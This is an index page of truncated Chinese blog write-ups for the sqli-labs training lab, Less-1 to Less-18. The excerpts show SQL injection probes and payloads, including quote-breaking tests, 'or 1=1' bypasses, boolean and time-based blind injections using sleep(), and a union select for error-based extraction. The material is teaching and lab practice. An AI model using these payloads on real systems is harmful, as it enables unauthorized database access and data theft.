sqli-labs
S1xTwe1ve
这个作者很懒,什么都没留下…
展开
-
sqli-labs Less-18
LESS-18 POST - Header Injection -Uagent field - Error based0x01.随便测试几个查看有无回显错误回显和正确回显都是显示IP地址错误回显:正确回显:在正确的回显中可以看见user agent,猜测可以利用进行注入,可以查看源码进行分析。用户名与密码的获取方式是post,而且采用了check_input处理,所以在这两个地...原创 2020-05-04 21:42:02 · 776 阅读 · 0 评论 -
sqli-labs Less-17
Less-17 POST -Update Query -Error Based -String0x01.查看代码与往常一样随便输入几组测试一下uname=1’&passwd=1uname=1”&passwd=1uname=1&passwd=1’uname=1&passwd=1”都返回错误页面根据这关提示,Mysql语句应该涉及到update,查看一下...原创 2020-04-09 19:22:14 · 163 阅读 · 0 评论 -
sqli-labs Less-16
Less-16 POST -Blind -Boolian/Time Based -Double quotesLess-16和Less-15关都是盲注,在构造payload的时候只需要把’替换为")就可以了。0x01.查询语句:uname=1&passwd=1 or 1=1#uname=1&passwd=1’ or 1=1#uname=1&passwd=1” or...原创 2020-04-01 14:39:17 · 218 阅读 · 0 评论 -
sqli-labs Less-15
Less-15 POST -Blind -Boolian/time Based -Single quotes0x01.按F12查看界面代码,获取上传表单的值是为uname和passwduname相当于登录框中的usernamepasswd相当于登陆框中的password任意输入uname 和 passwd , 只返回错误界面,但无任何报错信息构造永真条件使返回忽略用户名和密码不正确这...原创 2020-03-29 13:48:38 · 163 阅读 · 0 评论 -
sqli-labs Less-14
Less-14 POST -Double Injection -Single quotes - String -with twist与Less-13只有闭合方式不同,都是通过双注入来破解。基本步骤一致。0x01.uname=1&passwd=1&submit=Submituname=1"&passwd=1&submit=SubmitYou have ...原创 2020-03-28 12:05:38 · 319 阅读 · 0 评论 -
sqli-labs Less-13
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1') LIMIT 0,1' at line 1uname= ') union select count(*),c...原创 2020-03-27 14:21:34 · 130 阅读 · 0 评论 -
sqli-labs Less-12
Less-12 POST -Error Based - Double quotes - String - with twistLess-11 与 Less-12差别在于一个是单引号一个是双引号加括号,对于Less-12就直接用burp suite来做练习,步骤与Less-11基本一致。0x01.原页面用户名和密码两个参数分别为uname和passwd。Burp中提交参数uname=xxx&...原创 2020-03-26 13:58:17 · 236 阅读 · 0 评论 -
sqli-labs Less-11
Less-11 POST - Error Based - Single quotes - String0x01.原页面检查元素可以看到用户名和密码两个参数分别为uname和passwd输入正确的用户名和密码有正确的回显输入错误的用户名和密码0x02.判断注入类型uname=1 passwd=1uname=1" passwd=1uname=1’ passwd=1Yo...原创 2020-03-26 13:08:34 · 437 阅读 · 0 评论 -
sqli-labs Less-10
Less-10 Get - Blind -Time based -double quotes基于时间的盲注(Less-9 与Less-10的区别在于一个是单引号一个是双引号,其他判断步骤一致)正确的直接返回,错误的时候等待5秒钟。1.猜测数据库:?id=1” and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+?id=1” a...原创 2020-03-25 12:19:49 · 189 阅读 · 0 评论 -
sqli-labs Less-9
Less-9 Get - Blind -Time based -Single Quotes原页面基于时间的盲注如果是正确的直接返回,错误的时候等待5秒钟。1.猜测数据库:?id=1’ and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+?id=1’ and If(ascii(substr(database(),1,1))=1...原创 2020-03-24 13:19:01 · 147 阅读 · 0 评论 -
sqli-labs Less-8
Less-8 Get - Blind -Boolian Based -Single Quotes1.原页面2.?id=13.?id=1’4.尝试布尔盲注代码存在sql注入漏洞,然而页面既不会回显数据,也不会回显错误信息,我们可以通过构造语句,来判断数据库信息的正确性,再通过页面的“真”和“假”来识别我们判断的是否正确?id=1’ and (length(database()))>...原创 2020-03-13 00:15:59 · 1361 阅读 · 0 评论 -
sqli-labs Less-7
Less-7 GET - Dump into outfile -String原页面分析是哪种类型注入?id=1?id=1’?id=1”?id=1’ or 1=1–+ 将查询语句后半段注释掉发现仍然报错说明有括号。?id=1’) or 1=1–+?id=1’)) or 1=1–+推断查询语句为:Select * from users where id=((‘$id’))查...原创 2020-03-09 00:57:56 · 143 阅读 · 0 评论 -
sqli-labs Less-6
Less-6 GET - Double Injection -Double quotes - String1.原页面2.?id=13.?id=1‘’’1\’’ LIMIT 0,1’ --> ‘ ‘’1\’’LIMIT 0,1 ‘ --> ‘’1\’’LIMIT 0,1 -->SQL:Select login_name,password from admin ...原创 2020-03-06 19:48:31 · 146 阅读 · 0 评论 -
sqli-labs Less-4
Less-4 GET - Error based -Double Quotes - String1.原页面2.?id=13.?id=1’4.‘ ‘’1\’’) LIMIT 0,1 ‘ --> ‘’1\’’) LIMIT 0,1SQL:Select login_name,password from admin where id =(“id”) limit 0,15.i...原创 2020-03-06 17:24:04 · 100 阅读 · 0 评论 -
sqli-labs Less-5
Less-5 GET - Double Injection -Single quotes - String1.原页面2. ?id=1输入正确不会查询数据库,而是直接返回 you are in…所以要让它报错,显示我们要的信息。3.?id=1’‘’1’’LIMIT 0,1’ --> (去掉单引号) ‘1’’LIMIT 0,1 -->因为我们输入的是id=1’也就...原创 2020-03-06 17:45:14 · 149 阅读 · 0 评论 -
sqli-labs Less-3
Less-3 GET - Error based -Single quotes with twist- String1.原页面2.?id=13.?id=1’‘ ‘1’’) LIMIT 0,1 ‘ --> ‘1’’) LIMIT 0,1 --> ‘1’) LIMIT 0,1 -->(‘1’) LIMIT 0,1SQL:Select login_na...原创 2020-03-05 17:35:46 · 210 阅读 · 0 评论 -
sqli-labs Less-1
Less-1 GET - Error based -Single quotes - String1.原页面2.?id=13.?id=1’‘’1’’LIMIT 0,1’ --> (去掉单引号) ‘1’’LIMIT 0,1 -->因为我们输入的是id=1’也就是input=1’ 所以可以判断为 ‘input‘LIMIT 0,1SQL:Select login_name...原创 2020-02-28 18:12:58 · 166 阅读 · 0 评论 -
sqli-labs Less-2
Less-2 GET - Error based - Intiger based1.原页面2.?id=13.?id=1’‘’LIMIT 0,1’ --> ‘ ‘LIMIT 0,1 ‘ --> ‘LIMIT 0,1 --> 因为我们输入的是id=1’ 也就是input=1’ 所以可以判断其为 input LIMIT 0,1SQL:Select login_n...原创 2020-03-04 16:48:56 · 102 阅读 · 0 评论